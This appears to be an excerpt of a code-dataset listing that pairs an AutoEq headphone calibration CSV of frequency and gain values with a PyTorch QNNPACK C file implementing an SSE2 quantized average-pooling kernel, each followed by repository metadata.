9845.68,5.21
9944.14,4.41
10043.58,3.58
10144.02,2.75
10245.46,1.94
10347.91,1.17
10451.39,0.47
10555.91,-0.18
10661.46,-0.76
10768.08,-1.30
10875.76,-1.75
10984.52,-2.14
11094.36,-2.49
11205.31,-2.80
11317.36,-3.12
11430.53,-3.46
11544.84,-3.80
11660.29,-4.20
11776.89,-4.65
11894.66,-5.09
12013.60,-5.56
12133.74,-6.00
12255.08,-6.42
12377.63,-6.79
12501.41,-7.09
12626.42,-7.32
12752.68,-7.46
12880.21,-7.52
13009.01,-7.48
13139.10,-7.35
13270.49,-7.11
13403.20,-6.75
13537.23,-6.34
13672.60,-5.89
13809.33,-5.42
13947.42,-4.97
14086.90,-4.55
14227.77,-4.19
14370.04,-3.97
14513.74,-3.90
14658.88,-3.99
14805.47,-4.25
14953.52,-4.65
15103.06,-5.21
15254.09,-5.89
15406.63,-6.64
15560.70,-7.44
15716.30,-8.23
15873.47,-9.00
16032.20,-9.76
16192.52,-10.52
16354.45,-11.20
16517.99,-11.75
16683.17,-12.15
16850.01,-12.39
17018.51,-12.50
17188.69,-12.67
17360.58,-12.73
17534.18,-12.75
17709.53,-12.75
17886.62,-12.80
18065.49,-13.18
18246.14,-13.76
18428.60,-14.36
18612.89,-15.00
18799.02,-15.66
18987.01,-16.33
19176.88,-17.34
19368.65,-18.39
19562.33,-19.46
19757.96,-20.57
19955.54,-21.69
| CSV | 1 | vinzmc/AutoEq | research/calibration/crinacle_harman_over-ear_2018_wo_bass.csv | [
"MIT"
] |
/*
* Copyright (c) Facebook, Inc. and its affiliates.
* All rights reserved.
*
* This source code is licensed under the BSD-style license found in the
* LICENSE file in the root directory of this source tree.
*/
#include <assert.h>
#include <emmintrin.h>
#include <qnnpack/q8avgpool.h>
void pytorch_q8avgpool_ukernel_up8xm__sse2(
size_t n,
size_t ks,
size_t kc,
const uint8_t** input,
const uint8_t* zero,
uint8_t* output,
size_t input_increment,
size_t output_increment,
const union pytorch_qnnp_avgpool_quantization_params
quantization_params[RESTRICT_STATIC 1]) {
assert(n != 0);
assert(ks != 0);
assert(kc < 8);
const __m128i vbias =
_mm_load_si128((const __m128i*)&quantization_params->sse2.bias);
const __m128i vzero = _mm_setzero_si128();
const __m128 vscale = _mm_loadu_ps(quantization_params->sse2.scale);
do {
const uint8_t** next_input =
(const uint8_t**)((uintptr_t)input + input_increment);
__m128i vacc_lo = vbias;
__m128i vacc_hi = vbias;
size_t m = ks;
do {
const uint8_t* i = *input++;
i += kc;
__m128i vi = _mm_setzero_si128();
if (kc & 1) {
i -= 1;
vi = _mm_cvtsi32_si128((int)(uint32_t)*i);
}
if (kc & 2) {
vi = _mm_slli_epi32(vi, 16);
i -= 2;
vi = _mm_insert_epi16(vi, *((const uint16_t*)i), 0);
}
if (kc & 4) {
i -= 4;
vi = _mm_unpacklo_epi32(
_mm_cvtsi32_si128((int)*((const uint32_t*)i)), vi);
}
const __m128i vxi = _mm_unpacklo_epi8(vi, vzero);
vacc_lo = _mm_add_epi32(vacc_lo, _mm_unpacklo_epi16(vxi, vzero));
vacc_hi = _mm_add_epi32(vacc_hi, _mm_unpackhi_epi16(vxi, vzero));
} while (--m != 0);
input = next_input;
const __m128 vacc_lo_f = _mm_mul_ps(_mm_cvtepi32_ps(vacc_lo), vscale);
const __m128 vacc_hi_f = _mm_mul_ps(_mm_cvtepi32_ps(vacc_hi), vscale);
const __m128i vscaled_lo = _mm_cvtps_epi32(vacc_lo_f);
const __m128i vscaled_hi = _mm_cvtps_epi32(vacc_hi_f);
__m128i vout = _mm_packs_epi32(vscaled_lo, vscaled_hi);
vout = _mm_adds_epi16(
vout,
_mm_load_si128(
(const __m128i*)quantization_params->sse2.output_zero_point));
vout = _mm_packus_epi16(vout, vout);
vout = _mm_min_epu8(
vout,
_mm_load_si128((const __m128i*)quantization_params->sse2.output_max));
vout = _mm_max_epu8(
vout,
_mm_load_si128((const __m128i*)quantization_params->sse2.output_min));
if (kc & 4) {
*((uint32_t*)output) = (uint32_t)_mm_cvtsi128_si32(vout);
output += 4;
vout = _mm_srli_epi64(vout, 32);
}
if (kc & 2) {
*((uint16_t*)output) = (uint16_t)_mm_extract_epi16(vout, 0);
output += 2;
vout = _mm_srli_epi32(vout, 16);
}
if (kc & 1) {
*((uint8_t*)output) = (uint8_t)_mm_cvtsi128_si32(vout);
output += 1;
}
output = (uint8_t*)((uintptr_t)output + output_increment);
} while (--n != 0);
}
| C | 2 | Hacky-DH/pytorch | aten/src/ATen/native/quantized/cpu/qnnpack/src/q8avgpool/up8xm-sse2.c | [
"Intel"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.